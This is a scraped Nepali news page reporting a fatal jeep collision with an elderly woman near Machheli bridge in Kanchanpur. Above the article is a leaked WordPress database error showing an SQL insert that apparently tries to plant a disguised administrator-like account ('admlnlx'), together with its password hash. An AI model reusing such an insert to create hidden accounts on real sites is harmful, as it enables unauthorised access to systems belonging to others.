WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2K77EIO8DBJv5bWFAPLVeM5glVaEE/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:50:58', '', 'admlnlx', 'admlnlx')
कञ्चनपुर, माघ १२–
पूर्व–पश्चिम राजमार्गअन्तर्गत कञ्चनपुरको कृष्णपुर नगरपालिका–२ बाणीस्थित मछेली पुल नजिक जिपको ठक्करबाट स्थानीय एक वृद्धाको आज मृत्यु भएको छ ।
राजमार्ग पार गर्ने क्रममा ७० वर्षीया सेती थापामगरलाई म १ च ४४४ नंको स्कारपियो जिपले ठक्कर दिएको जिल्ला प्रहरी कार्यालय कञ्चनपुरले जनाएको छ ।
जिपको ठक्करबाट गम्भीर घाइते भएकी थापामगरलाई उपचारका लागि धनगढीस्थित सेती अञ्चल अस्पताल पुग्नासाथ चिकित्सकले मृत घोषणा गरेको प्रहरीले जनाएको छ । दुर्घटनापछि प्रहरीले स्कारपियो जिप र चालक कैलालीको चुहा नगरपालिकाका विरुराज जैसीलाई नियन्त्रणमा लिएको छ ।